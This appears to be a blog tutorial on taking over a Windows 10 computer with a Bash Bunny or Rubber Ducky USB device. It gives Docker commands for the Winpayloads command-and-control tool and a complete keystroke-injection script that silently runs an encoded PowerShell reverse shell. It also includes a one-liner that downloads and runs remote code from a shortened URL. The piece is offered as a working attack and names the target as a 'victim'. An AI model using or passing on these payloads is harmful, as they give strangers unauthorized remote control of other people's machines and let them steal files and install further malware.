🐇 Hacking a Windows 10 Computer with the Bash Bunny or Rubber Ducky 🐤

This guide will show you the simplest way to get a remote shell connection on a Windows 10 target just by plugging in the Bash Bunny. This connection will give you command line control over the computer from a remote location, which I’d constitute as a “hacking” a Windows computer.

This works equally as well, and probably better with a Rubber ducky (because it works faster) but I don’t own a Rubber Ducky, the Bash Bunny is just what I had on hand. Though most of the guide should work the same if you’re using a Rubber Ducky since they both simulate a keyboard.

Setup

  1. Bash Bunny or Rubber Ducky
  2. Remote Server (VPS)
  3. L33T haxing skills

Number 3 is a lie. We’ll be using Winpayloads to generate Powershell payloads and control our shell, all from one program. It’s a script kiddies dream! It takes just two commands to start running Winpayloads once you have a Virtual Private Server set up.

You could use any computer you own, but using a VPS service simplifies things. I recommend using DigitalOcean but any VPS service that can launch a Linux instance will work. There are plenty of guides out there on how to use Digital Ocean. Debian or Ubuntu will work great. Using my referral link like the one bellow will help support the upkeep of my own servers!

Then of course you need the hardware. Here’s a link to Hak5:

Command and Control

docker pull charliedean07/winpayloads:latest
docker run -e LANG=C.UTF-8 --net=host -it charliedean07/winpayloads

Then you should have Winpayloads launched and you’ll see this:

That’s it.

Creating Payload

That Powershell string will be the heart of your Bash Bunny / Rubber Ducky payload. Plug in your device and navigate to where the payloads are to be placed, and put in the following code:

ATTACKMODE HID
LED B
Q GUI r
Q DELAY 500
Q STRING powershell
Q DELAY 250
Q ENTER
Q DELAY 2000
Q STRING powershell.exe -w hidden -noni -enc [YOUR PAYLOAD HERE]
Q DELAY 500
Q ENTER
LED G

Your payload will be different each time you generate it with Winpayloads. After the -noni -enc part is where the base64 string starts that contains your reverse shell payload. Copy the base64 part and paste it over where it says [YOUR PAYLOAD HERE] like so:

Save the file and dismount your device, it’s now ready for attack.

Attack

Plug in your device.

The payload will take ~10 seconds to initiate if you’re using a Bash Bunny.

You should receive a connection back on your command and control server from whatever IP address your victim is connecting to the internet from.

Type client then 1 to begin controlling the Windows computer.

You can run any commands on your target, read files, launch more malware, or do some harmless fun like rick roll them with this command (don’t run strange scripts on computers or networks you care about):

iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store